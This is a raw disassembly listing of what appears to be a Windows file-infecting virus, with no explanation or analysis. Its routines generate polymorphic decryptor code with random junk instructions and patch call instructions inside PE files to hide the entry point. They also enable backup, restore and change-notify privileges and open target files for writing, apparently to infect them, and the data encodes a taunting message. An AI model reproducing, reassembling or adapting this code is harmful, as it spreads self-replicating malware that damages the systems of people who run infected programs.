dd 66202C74h, 6620726Fh, 6E656972h, 49207364h, 69617720h
dd 0A0D3A74h, 72656857h, 72612065h, 6F792065h, 66202C75h
dd 6E656972h, 203F7364h, 656D6F43h, 74492021h, 20736920h
dd 656D6974h, 74492021h, 6C207327h, 21657461h, 4CA2A1A8h
dd 10A61429h, 40375232h, 40375248h, 8F908788h, 27B1FAE5h
dd 0C26CCC5Ch, 86E15194h, 658000B9h, 0D8B8B352h, 15h dup(0)
dd 0C768988Fh, 0F4A58360h, 1042h, 42F8A583h, 0F000010h
; CODE XREF: UPX2:31514F2A�p
; UPX2:31514F51�p ...
dd 8D1443B7h, 0B70F1853h, 0D003064Bh, 2424448Bh, 720C422Bh
dd 8423B19h, 428B1473h, 0C422B14h, 42F49589h, 85890010h
dd 1042F8h, 0C28305EBh, 61D9E228h, 880004C2h, 10246785h
dd 64E800h, 1F680000h, 8D000000h, 10239485h, 18395900h
dd 0C0830C74h, 0FFF7E204h, 1042D085h, 0D9F7C300h, 24678D03h
dd 10E30010h, 8FFC70FFh, 4E88300h, 9D89F6E2h, 102394h
dd 74003A83h, 3322B05h, 4E8D1072h, 5E5B58FCh, 74003A83h
dd 0EB32FF04h, 1072FF03h, 0FFFF57E8h, 2BCE2BFFh, 1042F88Dh
dd 4B035800h, 858FC334h, 1042D4h, 42D085C7h, 10h, 3CE80000h
dd 8B000000h, 1042D085h, 0F6A9E800h, 18E8FFFFh, 83000000h
dd 1042D0BDh, 8750000h, 24109D89h, 9CEB0010h, 42D08DFFh
dd 8FC30010h, 1042D485h, 0D0958900h, 0E8001042h, 3, 8BC3C933h
dd 8093h, 0EDE85200h, 3FFFFFEh, 1042F895h, 83D60300h, 0F000C7Ah
dd 10784h, 107A8300h, 0FD840F00h, 8B000000h, 0E8500C42h
dd 0FFFFFEC8h, 42F88503h, 0C6030010h, 80088A50h, 197400F9h
dd 742EF980h, 0F1EB4003h, 8101488Bh, 0DFDFDFE1h, 44F981DFh
dd 75004C4Ch, 0C82B59ECh, 0FFAF983h, 0B78Fh, 78816600h
dd 0F3233FEh, 0AB85h, 3A835600h, 8B057500h, 2EB104Ah, 0F1030A8Bh
dd 0FE72E851h, 0B503FFFFh, 1042F8h, 78C085ADh, 84840FFBh
dd 0FF000000h, 1042F8B5h, 55E85000h, 3FFFFFEh, 1042F885h
dd 0F8858F00h, 3001042h, 83532404h, 0DB3302C0h, 0E308B60Fh
dd 20C98012h, 2424C153h, 241C2904h, 5B240C29h, 81E9EB40h
dd 0BBD70FFBh, 813E74DDh, 6E45A8FBh, 813674DBh, 0A13B59FBh
dd 812E74FFh, 0B522D6FBh, 812674ACh, 58E993FBh, 811E74F3h
dd 58E97DFBh, 811674F3h, 253F46FBh, 810E74E1h, 253F30FBh
dd 0FF0674E1h, 1042D495h, 71E95B00h, 5EFFFFFFh, 0E914C283h
dd 0FFFFFEEFh, 46A03C3h, 0F549E858h, 9588FFFFh, 102641h
dd 1831B866h, 0E4C0E202h, 66E20203h, 58066AABh, 0FFF52EE8h
dd 8C283FFh, 56AD187h, 0F521E858h, 0FA80FFFFh, 0B00B7303h
dd 41850250h, 0AA001026h, 686A27EBh, 0FA80AA58h, 0B0187503h
dd 0F501E811h, 1B8FFFFh, 84000000h, 0D10D74D2h, 0EBCAFEE0h
dd 0B805EBF6h, 80000000h, 0C3BFE2ABh, 39CC958Dh, 0D72B0010h
dd 0F7C3DAF7h, 1039C085h, 0
; ---------------------------------------------------------------------------
adc [edi], cl
xchg eax, ebp
rol cl, 0E0h
or esi, esi
test [esi+1001039h], edi
jnz short loc_315146D6
or ax, 2589h
jmp short loc_315146E9
; ---------------------------------------------------------------------------
loc_315146D6: ; CODE XREF: UPX2:315146CE�j
test byte ptr [ebp+1039BEh], 2
jnz short loc_315146E5
or ax, 2531h
jmp short loc_315146E9
; ---------------------------------------------------------------------------
loc_315146E5: ; CODE XREF: UPX2:315146DD�j
or ax, 2501h
loc_315146E9: ; CODE XREF: UPX2:315146D4�j
; UPX2:315146E3�j
stosw
call near ptr dword_31514410+29Ch
mov eax, [ebx+34h]
mov [ebp+1042E8h], edx
stosd
retn
; =============== S U B R O U T I N E =======================================
sub_315146FB proc near ; CODE XREF: UPX2:31514D47�p
test dword ptr [ebp+1039C0h], 10000000h
setnz al
add al, 0BCh
stosb
call near ptr dword_31514410+29Ch
mov [ebp+1042ECh], edx
test byte ptr [ebp+1039BEh], 1
jnz short loc_31514723
rdtsc
jmp short loc_31514725
; ---------------------------------------------------------------------------
loc_31514723: ; CODE XREF: sub_315146FB+22�j
sub eax, eax
loc_31514725: ; CODE XREF: sub_315146FB+26�j
stosd
retn
sub_315146FB endp
; =============== S U B R O U T I N E =======================================
sub_31514727 proc near ; CODE XREF: UPX2:loc_31514D51�p
test dword ptr [ebp+1039C0h], 10000000h
jz short loc_3151475A
mov al, [ebp+1039BAh]
shl eax, 0Bh
or ax, 458Bh
stosw
mov al, 0F8h
stosb
mov al, [ebp+1039BAh]
shl eax, 1Bh
add eax, 6896467h
stosd
xor eax, eax
stosw
jmp short locret_3151476C
; ---------------------------------------------------------------------------
loc_3151475A: ; CODE XREF: sub_31514727+A�j
mov eax, 58F64h
stosd
mov al, [ebp+1039BAh]
add al, 58h
shl eax, 18h
stosd
locret_3151476C: ; CODE XREF: sub_31514727+31�j
retn
sub_31514727 endp
; =============== S U B R O U T I N E =======================================
sub_3151476D proc near ; CODE XREF: sub_315147DF:loc_31514806�p
; sub_315147DF+4C�p ...
mov byte ptr [ebp+10279Ch], 9
jmp short loc_3151479B
; ---------------------------------------------------------------------------
loc_31514776: ; CODE XREF: sub_3151476D+44�j
mov al, 0FCh
jmp short loc_3151479A
; ---------------------------------------------------------------------------
loc_3151477A: ; CODE XREF: sub_3151476D+48�j
mov ax, 0EBh
stosw
jmp short loc_3151479B
; ---------------------------------------------------------------------------
loc_31514782: ; CODE XREF: sub_3151476D+4C�j
push 4
pop eax
call near ptr dword_31513B50+43h
lea eax, [edx+edx*8]
shl eax, 8
add ax, 0C089h
stosw
jmp short loc_3151479B
; ---------------------------------------------------------------------------
loc_31514798: ; CODE XREF: sub_3151476D+50�j
mov al, 90h
loc_3151479A: ; CODE XREF: sub_3151476D+B�j
; sub_3151476D+60�j ...
stosb
loc_3151479B: ; CODE XREF: sub_3151476D+7�j
; sub_3151476D+13�j ...
push 15h
pop eax
call near ptr dword_31513B50+43h
add byte ptr [ebp+10279Ch], 6
cmp dl, 8
jnb short locret_315147DE
test dl, dl
jz short loc_31514776
dec dl
jz short loc_3151477A
dec dl
jz short loc_31514782
dec dl
jz short loc_31514798
dec dl
jz short loc_315147CF
dec dl
jz short loc_315147D6
dec dl
jz short loc_315147DA
mov al, 0F9h
jmp short loc_3151479A
; ---------------------------------------------------------------------------
loc_315147CF: ; CODE XREF: sub_3151476D+54�j
mov al, 87h
stosb
mov al, 0DBh
jmp short loc_3151479A
; ---------------------------------------------------------------------------
loc_315147D6: ; CODE XREF: sub_3151476D+58�j
mov al, 0F5h
jmp short loc_3151479A
; ---------------------------------------------------------------------------
loc_315147DA: ; CODE XREF: sub_3151476D+5C�j
mov al, 0F8h
jmp short loc_3151479A
; ---------------------------------------------------------------------------
locret_315147DE: ; CODE XREF: sub_3151476D+40�j
retn
sub_3151476D endp
; =============== S U B R O U T I N E =======================================
sub_315147DF proc near ; CODE XREF: UPX2:loc_31514C28�p
; UPX2:31514DDB�p
test dword ptr [ebp+1039C0h], 2000h
mov al, 86h
jnz short loc_315147EF
add al, 4
loc_315147EF: ; CODE XREF: sub_315147DF+C�j
lea ecx, [edi-2]
mov ah, [ebp+1039B8h]
stosw
cmp ah, 5
jnz short loc_31514806
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_31514806: ; CODE XREF: sub_315147DF+1E�j
call sub_3151476D
test dword ptr [ebp+1039C0h], 4000h
mov ax, 3166h
jnz short loc_3151481D
mov ah, 29h
loc_3151481D: ; CODE XREF: sub_315147DF+3A�j
stosw
mov al, 18h
or al, [ebp+1039BAh]
shl al, 3
stosb
call sub_3151476D
mov al, 88h
test dword ptr [ebp+1039C0h], 8000h
jnz short loc_31514840
mov al, 86h
loc_31514840: ; CODE XREF: sub_315147DF+5D�j
mov ah, [ebp+1039B8h]
stosw
cmp ah, 5
jnz short locret_31514854
mov al, 0
or byte ptr [edi-1], 40h
stosb
locret_31514854: ; CODE XREF: sub_315147DF+6C�j
retn
sub_315147DF endp
; ---------------------------------------------------------------------------
loc_31514855: ; CODE XREF: sub_3151545B+183�p
lea edi, [ebp+1039CCh]
call sub_3151476D
test dword ptr [ebp+1039C0h], 400000h
jz short near ptr unk_3151486F
mov al, 60h
stosb
; ---------------------------------------------------------------------------
unk_3151486F db 0F7h ; ; CODE XREF: UPX2:3151486A�j
db 85h ;
db 0C0h ;
db 39h ; 9
db 10h
db 0
db 0
db 0
db 0
; ---------------------------------------------------------------------------
adc [edi+eax-48h], dh
push ebp
mov ebp, esp
add [ebx-3F7A08B1h], ch
cmp [eax], edx
add [ebx], al
; ---------------------------------------------------------------------------
db 2 dup(0), 2
dd 0F0840Fh, 0E8B00000h, 0BD89ABAAh, 1042D8h, 0FFFECCE8h
dd 0AAE8B0FFh, 0DCBD89ABh, 0E8001042h, 0FFFFFEBDh, 39C085F7h
dd 30010h, 1A740000h, 39C085F7h, 10h, 0A740200h, 0FFFE2EE8h
dd 0FE9BE8FFh, 0E9B0FFFFh, 858BABAAh, 1042D8h, 0C82BCF8Bh
dd 42E0BD89h, 48890010h, 6467B8FCh, 33AB36FFh, 0F7AB66C0h
dd 1039C085h, 300h, 0F6137400h, 1039BE85h, 0A748000h, 0FFFDAAE8h
dd 0FE5BE8FFh, 67B8FFFFh, 0AB268964h, 0AB66C033h, 39C085F7h
dd 30010h, 5A740000h, 39BE85F6h, 75800010h, 0FD81E80Ah
dd 32E8FFFFh, 0E8FFFFFEh, 0FFFFFD02h, 14E820B0h, 0E3FFFFFBh
dd 0FFB86639h, 91AB6615h, 0C0958BABh, 0F7001039h, 3C2F7D2h
dd 75000000h, 0FCDCE814h, 1FB0FFFFh, 0FFFAEEE8h, 0FFB866FFh
dd 91AB6615h, 8BCF8BABh, 1042E085h, 89C82B00h, 85F7FC48h
dd 1039C0h, 3, 85F73874h, 1039C0h, 0C000000h, 85F72C74h
dd 1039C0h, 2000000h, 0C2E80A75h, 0E8FFFFFDh, 0FFFFFD4Bh
dd 39C085F7h, 10h, 0A740800h, 0FFFDACE8h, 0FD61E8FFh, 85F7FFFFh
dd 1039C0h, 4, 96E81774h, 0B8FFFFFDh, 0C8FEC029h, 0C008B8ABh
dd 0B8AB0474h, 67EBF875h, 0FD7FE8ABh, 85F7FFFFh, 1039C0h
dd 8, 0BD807275h, 1039BEh, 0E8697400h, 0FFFFFD65h, 291829B8h
dd 0BAA50AC9h, 0C0001039h, 0A50A03E4h, 1039BAh, 0FD4BE8ABh
dd 0B1B0FFFFh, 0BE858AAAh, 0AA001039h, 0FFFD3CE8h, 85B60FFFh
dd 1039BAh, 4C0048Dh, 8E0C140h, 0AB668DB0h, 57AA01B0h
dd 0FFFD20E8h, 243C29FFh, 0FBE2B866h, 0C085F759h, 10001039h
dd 74000000h, 0AA49B007h, 0FA75B866h, 0AB66E102h, 0FFFCFCE8h
dd 0AAE8B0FFh, 89ABC033h, 1042C4BDh, 0C085F700h, 20001039h
dd 75000000h, 0DEE8573Bh, 0F7FFFFFCh, 1039C085h, 0
dd 89187480h, 1042F0BDh, 0FD39E800h, 0C2E8FFFFh, 0B0FFFFFCh
dd 0BAE8AAC3h, 5AFFFFFCh, 58B0CF8Bh, 850ACA2Bh, 1039B8h
dd 0AAFC4A89h, 0FFFCA4E8h, 81B866FFh, 0C085F7C0h, 40001039h
dd 74000000h, 28C48003h, 39B8A50Ah, 0AB660010h, 42C8BD89h
dd 0F7AB0010h, 1039C085h, 0
; ---------------------------------------------------------------------------
inc eax
jnz short loc_31514B00
mov al, 50h
add al, [ebp+1039B8h]
stosb
loc_31514B00: ; CODE XREF: UPX2:31514AF5�j
test dword ptr [ebp+1039C0h], 80h
jnz short loc_31514B17
mov al, 0B8h
or al, [ebp+1039B9h]
stosb
jmp short loc_31514B54
; ---------------------------------------------------------------------------
loc_31514B17: ; CODE XREF: UPX2:31514B0A�j
mov ax, 1831h
test dword ptr [ebp+1039C0h], 100h
jz short loc_31514B29
mov al, 29h
loc_31514B29: ; CODE XREF: UPX2:31514B25�j
or ah, [ebp+1039B9h]
shl ah, 3
or ah, [ebp+1039B9h]
stosw
mov ax, 0F081h
test dword ptr [ebp+1039C0h], 200h
jnz short loc_31514B4C
mov ah, 0C8h
loc_31514B4C: ; CODE XREF: UPX2:31514B48�j
or ah, [ebp+1039B9h]
stosw
loc_31514B54: ; CODE XREF: UPX2:31514B15�j
mov [ebp+1042E4h], edi
mov eax, 29CCh
stosd
test dword ptr [ebp+1039C0h], 8
jz short loc_31514BDD
call sub_3151476D
test dword ptr [ebp+1039C0h], 400h
jnz short loc_31514B88
mov al, 0B8h
or al, [ebp+1039BAh]
stosb
jmp short loc_31514BD5
; ---------------------------------------------------------------------------
loc_31514B88: ; CODE XREF: UPX2:31514B7B�j
test dword ptr [ebp+1039C0h], 800h
jnz short loc_31514BA5
mov ax, 0E083h
or ah, [ebp+1039BAh]
stosw
xor eax, eax
stosb
jmp short loc_31514BBA
; ---------------------------------------------------------------------------
loc_31514BA5: ; CODE XREF: UPX2:31514B92�j
mov ax, 1829h
or ah, [ebp+1039BAh]
shl ah, 3
or ah, [ebp+1039BAh]
stosw
loc_31514BBA: ; CODE XREF: UPX2:31514BA3�j
test dword ptr [ebp+1039C0h], 1000h
mov ax, 0C081h
jz short loc_31514BCD
add ah, 8
loc_31514BCD: ; CODE XREF: UPX2:31514BC8�j
or ah, [ebp+1039BAh]
stosw
loc_31514BD5: ; CODE XREF: UPX2:31514B86�j
movzx eax, byte ptr [ebp+1039BEh]
stosd
loc_31514BDD: ; CODE XREF: UPX2:31514B6A�j
call sub_3151476D
test dword ptr [ebp+1039C0h], 40000000h
jz short loc_31514BFC
mov al, 50h
add al, [ebp+1039B8h]
stosb
call sub_3151476D
loc_31514BFC: ; CODE XREF: UPX2:31514BEC�j
lea ecx, [edi-2]
mov [ebp+1042CCh], ecx
test dword ptr [ebp+1039C0h], 80000000h
jz short loc_31514C28
mov al, 0E8h
stosb
mov eax, [ebp+1042F0h]
sub eax, edi
sub eax, 4
stosd
mov [ebp+1042F0h], edi
jmp short loc_31514C2D
; ---------------------------------------------------------------------------
loc_31514C28: ; CODE XREF: UPX2:31514C0F�j
call sub_315147DF
loc_31514C2D: ; CODE XREF: UPX2:31514C26�j
call sub_3151476D
test dword ptr [ebp+1039C0h], 10000h
jnz short loc_31514C49
mov al, 40h
or al, [ebp+1039B8h]
stosb
jmp short loc_31514C58
; ---------------------------------------------------------------------------
loc_31514C49: ; CODE XREF: UPX2:31514C3C�j
mov ax, 0C083h
or ah, [ebp+1039B8h]
stosw
mov al, 1
stosb
loc_31514C58: ; CODE XREF: UPX2:31514C47�j
test dword ptr [ebp+1039C0h], 20000h
jnz short loc_31514C93
test dword ptr [ebp+1039C0h], 40000h
jnz short loc_31514C8A
mov al, 0C0h
or al, [ebp+1039BAh]
mov ah, [ebp+1039BFh]
shl eax, 10h
mov ax, 8166h
stosd
mov al, 0
jmp short loc_31514C92
; ---------------------------------------------------------------------------
loc_31514C8A: ; CODE XREF: UPX2:31514C6E�j
mov al, 40h
or al, [ebp+1039BAh]
loc_31514C92: ; CODE XREF: UPX2:31514C88�j
stosb
loc_31514C93: ; CODE XREF: UPX2:31514C62�j
test dword ptr [ebp+1039C0h], 80000h
jnz short loc_31514CAF
mov ax, 0E883h
or ah, [ebp+1039B9h]
stosw
mov al, 1
jmp short loc_31514CB7
; ---------------------------------------------------------------------------
loc_31514CAF: ; CODE XREF: UPX2:31514C9D�j
mov al, 48h
or al, [ebp+1039B9h]
loc_31514CB7: ; CODE XREF: UPX2:31514CAD�j
stosb
call sub_3151476D
test dword ptr [ebp+1039C0h], 100000h
mov cl, 75h
jnz short loc_31514CF0
mov ax, 0F883h
or ah, [ebp+1039B9h]
stosw
xor eax, eax
stosb
sub [ebp+1042CCh], edi
test dword ptr [ebp+1039C0h], 200000h
jnz short loc_31514D0B
mov cl, 77h
jmp short loc_31514D0B
; ---------------------------------------------------------------------------
loc_31514CF0: ; CODE XREF: UPX2:31514CC9�j
mov ax, 1809h
or ah, [ebp+1039B9h]
shl ah, 3
or ah, [ebp+1039B9h]
stosw
sub [ebp+1042CCh], edi
loc_31514D0B: ; CODE XREF: UPX2:31514CEA�j
; UPX2:31514CEE�j
mov al, cl
mov ah, [ebp+1042CCh]
stosw
mov al, 58h
add al, [ebp+1039B8h]
stosb
call sub_3151476D
test dword ptr [ebp+1039C0h], 2000003h
jz short loc_31514D5B
test dword ptr [ebp+1039C0h], 8000000h
jnz short loc_31514D5B
test dword ptr [ebp+1039C0h], 6000000h
jnz short loc_31514D51
call sub_315146FB
call sub_3151476D
loc_31514D51: ; CODE XREF: UPX2:31514D45�j
call sub_31514727
call sub_3151476D
loc_31514D5B: ; CODE XREF: UPX2:31514D2D�j
; UPX2:31514D39�j
test dword ptr [ebp+1039C0h], 10000000h
jz short loc_31514D6F
mov al, 0C9h
stosb
call sub_3151476D
loc_31514D6F: ; CODE XREF: UPX2:31514D65�j
test dword ptr [ebp+1039C0h], 400000h
jz short loc_31514DA5
mov al, 7
sub al, [ebp+1039B8h]
shl eax, 1Ah
or eax, 240889h
add ah, [ebp+1039B8h]
shl ah, 3
add ah, 4
stosd
call sub_3151476D
mov al, 61h
stosb
call sub_3151476D
loc_31514DA5: ; CODE XREF: UPX2:31514D79�j
mov ax, 0E0FFh
or ah, [ebp+1039B8h]
stosw
call sub_3151476D
test dword ptr [ebp+1039C0h], 20h
jz short loc_31514E31
test dword ptr [ebp+1039C0h], 80000000h
jz short loc_31514DED
mov eax, edi
mov ecx, [ebp+1042F0h]
sub eax, ecx
mov [ecx-4], eax
call sub_315147DF
call sub_3151476D
mov al, 0C3h
stosb
call sub_3151476D
loc_31514DED: ; CODE XREF: UPX2:31514DCC�j
mov eax, edi
mov ecx, [ebp+1042C4h]
sub eax, ecx
mov [ecx-4], eax
mov al, 58h
or al, [ebp+1039B8h]
stosb
call sub_3151476D
test dword ptr [ebp+1039C0h], 800000h
jz short loc_31514E20
mov ax, 0C350h
or al, [ebp+1039B8h]
jmp short loc_31514E2A
; ---------------------------------------------------------------------------
loc_31514E20: ; CODE XREF: UPX2:31514E12�j
mov ax, 0E0FFh
or ah, [ebp+1039B8h]
loc_31514E2A: ; CODE XREF: UPX2:31514E1E�j
stosw
call sub_3151476D
loc_31514E31: ; CODE XREF: UPX2:31514DC0�j
test dword ptr [ebp+1039C0h], 2000003h
jz short loc_31514E9C
mov ecx, edi
mov eax, [ebp+1042DCh]
sub ecx, eax
mov [eax-4], ecx
xor ecx, ecx
test dword ptr [ebp+1039C0h], 1000000h
jnz short loc_31514E66
lea eax, [ebp+1039B8h]
loc_31514E5E: ; CODE XREF: UPX2:31514E64�j
mov cl, [eax]
inc eax
cmp cl, 3
jnb short loc_31514E5E
loc_31514E66: ; CODE XREF: UPX2:31514E56�j
lea eax, ds:102444h[ecx*8]
shl eax, 8
mov al, 8Bh
stosd
jecxz short loc_31514E7B
mov ax, 0C031h
stosw
loc_31514E7B: ; CODE XREF: UPX2:31514E73�j
mov ax, 808Fh
push 0B8h
add ah, cl
stosw
pop eax
stosd
test ecx, ecx
jnz short loc_31514E94
mov ax, 0C031h
stosw
loc_31514E94: ; CODE XREF: UPX2:31514E8C�j
mov al, 0C3h
stosb
call sub_3151476D
loc_31514E9C: ; CODE XREF: UPX2:31514E3B�j
lea eax, [ebp+1039CCh]
test dword ptr [ebp+1039C0h], 20000000h
jnz short loc_31514EB4
push edi
sub edi, eax
pop eax
jmp short loc_31514ECD
; ---------------------------------------------------------------------------
loc_31514EB4: ; CODE XREF: UPX2:31514EAC�j
mov edx, [ebx+28h]
sub edi, eax
sub edx, eax
mov ecx, [ebp+1042E4h]
add [ebp+1042C4h], edx
add [ecx], edi
mov eax, [esp+4]
loc_31514ECD: ; CODE XREF: UPX2:31514EB2�j
mov [ebp+101069h], edi
mov edi, [ebp+1042C8h]
sub eax, [ebp+1042C4h]
test dword ptr [ebp+1039C0h], 40h
jz short loc_31514EED
neg eax
loc_31514EED: ; CODE XREF: UPX2:31514EE9�j
stosd
retn 4
; =============== S U B R O U T I N E =======================================
sub_31514EF1 proc near ; CODE XREF: sub_3151545B+336�p
push esi
push edi
cmp dword ptr [ebp+104300h], 0
jz loc_315150D9
call near ptr loc_31514F11+1
dec ebx
inc ebp
push edx
dec esi
inc ebp
dec esp
xor esi, [edx]
db 2Eh
inc esp
dec esp
dec esp
loc_31514F11: ; CODE XREF: sub_31514EF1+F�p
add bh, bh
sub_31514EF1 endp ; sp-analysis failed
xchg eax, ebp
scasb
db 3Eh
adc [eax], al
mov [ebp+104314h], eax
push ebx
mov ebx, [eax+3Ch]
add ebx, eax
push dword ptr [ebx+28h]
mov eax, [ebx+34h]
call near ptr dword_31514410+4
mov edx, [ebp+1042F4h]
pop ebx
add eax, [edx+0Ch]
mov [ebp+104318h], eax
add eax, [edx+8]
mov [ebp+10431Ch], eax
mov esi, [ebx+28h]
push dword ptr [ebx+80h]
call near ptr dword_31514410+4
mov edi, [ebp+1042F4h]
push esi
call near ptr dword_31514410+4
mov edx, [ebp+1042F4h]
mov ecx, [edx+8]
add ecx, [edx+0Ch]
sub ecx, esi
sub ecx, 5
js loc_315150D9
jz loc_315150D9
add esi, [ebp+1042F8h]
add esi, [ebp+1042B4h]
; START OF FUNCTION CHUNK FOR sub_315150AA
loc_31514F8B: ; CODE XREF: sub_315150AA+29�j
lodsb
cmp al, 0E8h
jnz loc_31515036
lea eax, [esi+4]
sub eax, [ebp+1042B4h]
add eax, [esi]
push eax
call near ptr dword_31514410+4
cmp dword ptr [ebp+1042F4h], 0
jnz short loc_31514FB9
cmp eax, [edi+0Ch]
jnb loc_315150D2
jmp short loc_31514FC5
; ---------------------------------------------------------------------------
loc_31514FB9: ; CODE XREF: sub_315150AA-FE�j
cmp [ebp+1042F4h], edx
jnz loc_315150D2
loc_31514FC5: ; CODE XREF: sub_315150AA-F3�j
add eax, [ebp+1042B4h]
cmp word ptr [eax], 25FFh
jnz loc_315150D2
mov eax, [eax+2]
sub eax, [ebx+34h]
push eax
call near ptr dword_31514410+4
cmp [ebp+1042F4h], edi
jnz loc_315150D2
add eax, [ebp+1042F8h]
add eax, [ebp+1042B4h]
mov eax, [eax]
sub eax, [edi+0Ch]
jb loc_315150D2
cmp eax, [edi+8]
jnb loc_315150D2
loc_3151500E: ; CODE XREF: sub_315150AA+22�j
add eax, 2
add eax, [edi+14h]
add eax, [ebp+1042B4h]
push edx
push eax
push dword ptr [ebp+104314h]
call dword ptr [ebp+103E6Eh]
pop edx
test eax, eax
jnz loc_315150E8
jmp loc_315150D2
; ---------------------------------------------------------------------------
loc_31515036: ; CODE XREF: sub_315150AA-11C�j
cmp al, 0FFh
jnz loc_315150D2
cmp byte ptr [esi], 15h
jnz loc_315150D2
mov eax, [esi+1]
sub eax, [ebx+34h]
push eax
call near ptr dword_31514410+4
cmp [ebp+1042F4h], edi
jnz short loc_315150D2
add eax, [ebp+1042F8h]
add eax, [ebp+1042B4h]
mov [ebp+104320h], eax
mov eax, [eax]
cmp eax, [ebp+104318h]
jb short loc_3151507F
cmp eax, [ebp+10431Ch]
jb short loc_315150E8
loc_3151507F: ; CODE XREF: sub_315150AA-35�j
cmp eax, 70000000h
jb short loc_315150BD
call sub_315150AA
lea ecx, [esi-4]
mov eax, ecx
sub eax, [edx]
add eax, [edx+10h]
cmp eax, [ebp+104320h]
jnz short locret_315150A9
add esp, 10h
push dword ptr [ecx]
pop [esp-8+arg_20]
popa
jmp short loc_315150C4
; ---------------------------------------------------------------------------
locret_315150A9: ; CODE XREF: sub_315150AA-F�j
retn
; END OF FUNCTION CHUNK FOR sub_315150AA
; =============== S U B R O U T I N E =======================================
sub_315150AA proc near ; CODE XREF: sub_315150AA-24�p
var_10 = dword ptr -10h
arg_20 = dword ptr 24h
; FUNCTION CHUNK AT 31514F8B SIZE 0000011F BYTES
pop dword ptr [ebp+1042D4h]
pusha
mov esi, [ebp+1042B4h]
call near ptr dword_31514410+10Bh
popa
loc_315150BD: ; CODE XREF: sub_315150AA-26�j
test eax, 80000000h
jnz short loc_315150D2
loc_315150C4: ; CODE XREF: sub_315150AA-3�j
sub eax, [edi+0Ch]
jb short loc_315150D2
cmp eax, [edi+8]
jb loc_3151500E
loc_315150D2: ; CODE XREF: sub_315150AA-F9�j
; sub_315150AA-EB�j ...
dec ecx
jnz loc_31514F8B
loc_315150D9: ; CODE XREF: sub_31514EF1+9�j
; UPX2:31514F73�j ...
mov edi, [esp+0]
and dword ptr [edi+29C0h], 0FFBFFFFFh
jmp short loc_3151512A
; ---------------------------------------------------------------------------
loc_315150E8: ; CODE XREF: sub_315150AA-7F�j
; sub_315150AA-2D�j
or dword ptr [edx+24h], 0E0000060h
dec esi
xor eax, eax
mov ecx, [esp+10h+var_10]
xchg eax, [ebp+104300h]
mov [ebp+1042FCh], eax
lea edi, [ecx+29C4h]
add eax, [ebp+1042B4h]
movsw
movsd
dec esi
sub eax, esi
add eax, [edx+14h]
sub eax, [edx+0Ch]
mov byte ptr [esi-5], 0E8h
mov dword ptr [ecx+54h], 5
mov [esi-4], eax
loc_3151512A: ; CODE XREF: sub_315150AA+3C�j
pop edi
pop esi
retn
sub_315150AA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3151512D proc near ; CODE XREF: UPX2:3151542E�p
; FUNCTION CHUNK AT 31515257 SIZE 00000002 BYTES
push edi
call dword ptr [ebp+103EBAh]
shr eax, 1Fh
jnz loc_31515257
push eax
push esp
push 28h
push 0FFFFFFFFh
call dword ptr [ebp+103F1Ah]
test eax, eax
pop edi
js loc_31515257
call sub_315135AF
call near ptr loc_31515168+5
push ebx
db 65h
jz short near ptr unk_315151A6
imul ebp, [ebp+53h], 72756365h
loc_31515168: ; CODE XREF: sub_3151512D+2A�p
imul esi, [ecx+edi*2+41h], 88B5FF00h
sub_3151512D endp ; sp-analysis failed
inc edx
adc [eax], al
call dword ptr [ebp+103E6Eh]
mov [ebp+104290h], eax
call near ptr loc_3151519C+1
push ebx
db 65h
push esp
popa
imul esp, [ebp+4Fh], 77h
outsb
db 65h
jb short loc_31515203
push 72507069h
imul esi, [esi+69h], 6567656Ch
loc_3151519C: ; CODE XREF: UPX2:3151517F�p
add [edi-18h], dl
sub eax, ebp
; ---------------------------------------------------------------------------
db 0FFh
db 0FFh
db 0E8h ;
db 13h
db 0
unk_315151A6 db 0 ; CODE XREF: sub_3151512D+30�j
db 0
db 53h ; S
db 65h ; e
db 52h ; R
db 65h ; e
db 73h ; s
db 74h ; t
db 6Fh ; o
db 72h ; r
db 65h ; e
db 50h ; P
db 72h ; r
db 69h ; i
db 76h ; v
db 69h ; i
db 6Ch ; l
db 65h ; e
db 67h ; g
db 65h ; e
db 0
db 57h ; W
db 0E8h ;
db 0Bh
db 0E8h ;
db 0FFh
db 0FFh
db 0E8h ;
db 12h
db 0
db 0
db 0
db 53h ; S
db 65h ; e
db 42h ; B
db 61h ; a
db 63h ; c
db 6Bh ; k
db 75h ; u
db 70h ; p
db 50h ; P
db 72h ; r
db 69h ; i
db 76h ; v
db 69h ; i
db 6Ch ; l
db 65h ; e
db 67h ; g
db 65h ; e
db 0
db 57h ; W
db 0E8h ;
db 0EEh ;
db 0E7h ;
db 0FFh
db 0FFh
db 0E8h ;
db 18h
db 0
db 0
db 0
db 53h ; S
db 65h ; e
db 43h ; C
db 68h ; h
db 61h ; a
db 6Eh ; n
db 67h ; g
db 65h ; e
db 4Eh ; N
db 6Fh ; o
db 74h ; t
db 69h ; i
db 66h ; f
db 79h ; y
db 50h ; P
db 72h ; r
db 69h ; i
db 76h ; v
db 69h ; i
db 6Ch ; l
db 65h ; e
db 67h ; g
db 65h ; e
db 0
db 57h ; W
db 0E8h ;
db 0CBh ;
db 0E7h ;
db 0FFh
db 0FFh
db 50h ; P
db 54h ; T
; ---------------------------------------------------------------------------
loc_31515203: ; CODE XREF: UPX2:3151518D�j
lea eax, [ebp+103DCCh]
push 64h
push eax
push 1
push edi
call dword ptr [ebp+103F26h]
mov [esp], edi
call dword ptr [ebp+103E62h]
sub al, al
lea edi, [ebp+104184h]
push eax
push eax
push eax
push dword ptr [ebp+103DCCh]
push 40001h
push esp
push 1
push edi
call dword ptr [ebp+104290h]
push esp
push 4
push edi
call dword ptr [ebp+104290h]
add esp, 14h
push dword ptr [ebp+104288h]
call dword ptr [ebp+103E9Eh]
; START OF FUNCTION CHUNK FOR sub_3151512D
loc_31515257: ; CODE XREF: sub_3151512D+A�j
; sub_3151512D+1F�j
pop edi
retn
; END OF FUNCTION CHUNK FOR sub_3151512D
; =============== S U B R O U T I N E =======================================
sub_31515259 proc near ; CODE XREF: UPX2:31515427�p
; UPX2:31515433�p ...
lea esi, [ebp+104184h]
push esi
call dword ptr [ebp+103EA2h]
cmp eax, 0FFFFFFFFh
jz locret_3151532A
mov [ebp+104294h], eax
push 0
push esi
call dword ptr [ebp+103EDEh]
test eax, eax
jz locret_3151532A
sub eax, eax
push eax
push eax
push 3
push eax
push 1
push 0C0000000h
push esi
call dword ptr [ebp+103E7Eh]
cmp eax, 0FFFFFFFFh
jz loc_315158AB
mov [ebp+104298h], eax
lea ecx, [ebp+10429Ch]
lea edx, [ebp+1042A4h]
push ecx
push edx
push 0
push eax
